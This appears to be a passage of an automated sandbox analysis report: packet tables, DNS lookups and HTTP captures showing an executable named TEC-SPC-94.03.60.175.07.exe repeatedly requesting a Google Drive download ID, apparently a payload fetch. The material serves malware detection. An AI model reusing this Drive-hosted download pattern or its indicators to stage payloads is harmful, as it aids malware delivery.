                                                        Dec 16, 2024 17:58:47.793354034 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:47.803585052 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:47.803601027 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:47.803951979 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:47.804001093 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:47.807740927 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:47.851321936 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:48.707525015 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:48.707602978 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:48.707639933 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:48.707684040 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:48.708297968 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:48.708348989 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:48.708416939 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:48.708467007 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:48.709155083 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:48.709171057 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:48.730804920 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:48.730854034 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:48.731074095 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:48.731230021 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:48.731249094 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:50.426261902 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:50.426356077 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:50.427961111 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:50.427968025 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:50.428219080 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:50.428275108 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:50.428534985 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:50.471369028 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:51.372009039 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:51.372082949 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:51.372685909 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:51.372754097 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:51.372766018 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:51.372797012 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:51.372921944 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:51.372941971 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:51.521752119 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:51.521775007 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:51.521852016 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:51.522396088 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:51.522411108 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:53.218748093 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:53.218863964 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:53.219362974 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:53.219374895 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:53.219548941 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:53.219556093 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:54.133765936 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:54.133829117 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:54.133865118 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:54.133925915 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:54.134042978 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:54.134085894 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:54.134141922 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:54.147730112 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:54.147770882 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:54.147936106 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:54.148082972 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:54.148097992 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:55.841567039 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:55.841691971 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:55.843278885 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:55.843290091 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:55.843489885 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:55.843496084 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:56.813364983 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:56.813505888 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:56.813529968 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:56.813622952 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:56.814280033 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:56.814434052 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:56.814434052 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:56.814477921 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:56.814579010 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:56.933927059 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:56.933985949 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:56.934119940 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:56.934525013 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:56.934545040 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:58.635102987 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:58.635205984 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:58.638024092 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:58.638144970 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:58.640775919 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:58.640785933 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:58.641304970 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:58.641366959 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:58.641877890 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:58.683324099 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:59.546833992 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:59.546987057 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:59.547004938 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:59.547092915 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:59.547154903 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:59.547173023 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:59.547225952 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:59.564034939 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:59.564093113 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:59.564193010 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:59.564794064 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:59.564835072 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:01.265871048 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:01.266047955 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:01.267636061 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:01.267646074 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:01.268718004 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:01.268807888 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:01.269105911 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:01.311328888 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:02.213032961 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:02.213232994 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:02.213246107 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:02.213289976 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:02.213538885 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:02.213607073 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:02.213989019 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:02.214035034 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:02.214186907 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:02.214246988 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:02.214265108 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:02.339910030 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:02.339940071 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:02.341149092 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:02.341475010 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:02.341490030 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:04.046215057 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:04.046329021 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:04.203032017 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:04.203047037 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:04.203192949 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:04.203198910 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:04.967564106 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:04.967776060 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:04.967814922 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:04.967868090 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:04.967917919 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:04.968046904 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:04.968116999 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:04.977511883 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:04.977581978 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:04.977684021 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:04.977912903 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:04.977946043 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:06.681802034 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:06.681947947 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:06.683712959 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:06.683743954 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:06.684160948 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:06.684223890 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:06.689632893 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:06.731328011 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:07.630565882 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:07.630678892 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:07.630734921 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:07.630800009 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:07.631546021 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:07.631616116 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:07.631623983 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:07.631680965 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:07.631746054 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:07.631782055 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:07.631808043 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:07.631841898 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:07.761969090 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:07.762036085 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:07.762135029 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:07.762445927 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:07.762478113 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:09.468173027 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:09.468261957 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:09.468903065 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:09.468967915 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:09.470432043 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:09.470455885 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:09.470704079 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:09.470763922 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:09.471055031 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:09.515346050 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:10.377461910 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:10.377615929 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:10.377686024 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:10.377763987 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:10.377979994 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:10.378032923 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:10.378077984 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:10.378102064 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:10.378138065 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:10.392374039 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:10.392438889 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:10.392525911 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:10.392812967 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:10.392846107 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:12.087651014 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:12.087757111 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:12.088391066 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:12.088401079 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:12.088562012 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:12.088567972 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:13.025890112 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:13.026055098 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:13.026134968 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:13.026211023 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:13.026578903 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:13.026643038 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:13.026818037 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:13.026937962 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:13.027004004 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:13.152251005 CET50029443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:13.152302027 CET44350029172.217.19.174192.168.2.6
                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Dec 16, 2024 17:57:33.471755981 CET | 63934 | 53 | 192.168.2.6 | 1.1.1.1
                                                        Dec 16, 2024 17:57:33.609023094 CET | 53 | 63934 | 1.1.1.1 | 192.168.2.6
                                                        Dec 16, 2024 17:57:36.268054008 CET | 50363 | 53 | 192.168.2.6 | 1.1.1.1
                                                        Dec 16, 2024 17:57:36.406618118 CET | 53 | 50363 | 1.1.1.1 | 192.168.2.6
                                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                        Dec 16, 2024 17:57:33.471755981 CET | 192.168.2.6 | 1.1.1.1 | 0xe912 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                                                        Dec 16, 2024 17:57:36.268054008 CET | 192.168.2.6 | 1.1.1.1 | 0xf268 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
                                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                        Dec 16, 2024 17:57:06.968844891 CET | 1.1.1.1 | 192.168.2.6 | 0xaaca | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                        Dec 16, 2024 17:57:06.968844891 CET | 1.1.1.1 | 192.168.2.6 | 0xaaca | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
                                                        Dec 16, 2024 17:57:33.609023094 CET | 1.1.1.1 | 192.168.2.6 | 0xe912 | No error (0) | drive.google.com | | 172.217.19.174 | A (IP address) | IN (0x0001) | false
                                                        Dec 16, 2024 17:57:36.406618118 CET | 1.1.1.1 | 192.168.2.6 | 0xf268 | No error (0) | drive.usercontent.google.com | | 142.250.181.1 | A (IP address) | IN (0x0001) | false
                                                        • drive.google.com
                                                        • drive.usercontent.google.com
                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        0 | 192.168.2.6 | 49776 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:57:35 UTC | 216 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        2024-12-16 16:57:36 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:35 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-hCLsu_y5ql8EKfY3RX3q8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        1 | 192.168.2.6 | 49784 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:57:38 UTC | 258 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        2024-12-16 16:57:39 UTC | 2219 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC7_J-d-kUnNcZJuem94ZrY18AGb6irGmIf4YdlPYqVfSJ5y96NFG_QqOar-QJlWxvzA
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:38 GMT
                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-RjjFy2oloISL-BILCeSdbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Set-Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz; expires=Tue, 17-Jun-2025 16:57:38 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:57:39 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZhbRqxek3IyJj2ZEBl7J_A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        2 | 192.168.2.6 | 49790 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:57:40 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:57:41 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:41 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-mceV9CpLal9e22HXHeR_hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
